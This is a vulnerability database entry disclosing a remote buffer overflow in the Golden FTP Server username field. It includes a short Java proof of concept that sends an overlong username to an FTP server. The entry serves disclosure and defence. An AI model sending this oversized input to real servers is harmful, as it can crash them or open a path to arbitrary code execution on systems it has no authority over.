Golden FTP Server Username Remote Overflow

2005-03-02T16:15:07
ID OSVDB:14369
Type osvdb
Reporter Carlos Ulver(carlos.ulver@gmail.com)
Modified 2005-03-02T16:15:07

Description

Vulnerability Description

A remote overflow exists in Golden FTP Server. The Golden FTP Server fails to properly perform bounds checking on user-supplied input, resulting in a buffer overflow. With a specially crafted login request containing more than 284 characters in the Username field, a remote attacker can cause execution of arbitrary code on the system resulting in a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

A remote overflow exists in Golden FTP Server. The Golden FTP Server fails to properly perform bounds checking on user-supplied input, resulting in a buffer overflow. With a specially crafted login request containing more than 284 characters in the Username field, a remote attacker can cause execution of arbitrary code on the system resulting in a loss of integrity.

Manual Testing Notes

/ Carlos Ulver at gmail.com * www.debarry2.com.br/carlos * 03/01/05 * Golden Ftp Server 1.29(Freeware Version) Username Remote Buffer Overflow * This is only a proof of Concept. * This Ftpd was running in windows xp sp1 Portuguese(Brazilian) * / import java.net.URL; public class Pocgftpd {

    public static void main(String[] args) {
            String A = new String();

            for(int i=0;i<281;i++) A+='a';
            for (int i = 0; i < 4; i++) A+='b';

    try{
            //This 'a' for password means nothing...only to complete: user:passhost
            URL u = new URL("ftp://"+A+":a127.0.0.1");
            u.openStream();
            }catch(Exception E1){}

    }

}

References:

Vendor URL: http://www.goldenftpserver.com/ Security Tracker: 1013358 Secunia Advisory ID:15156 Secunia Advisory ID:23323 Packet Storm: http://packetstormsecurity.org/0503-exploits/goldenFTP192.txt Other Advisory URL: http://reedarvin.thearvins.com/20050427-01.html Other Advisory URL: http://retrogod.altervista.org/golden_heap.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0054.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0612.html ISS X-Force ID: 19575 ISS X-Force ID: 20299 Generic Exploit URL: http://www.milw0rm.com/id.php?id=967 FrSIRT Advisory: ADV-2006-4936 CVE-2005-0634 Bugtraq ID: 12704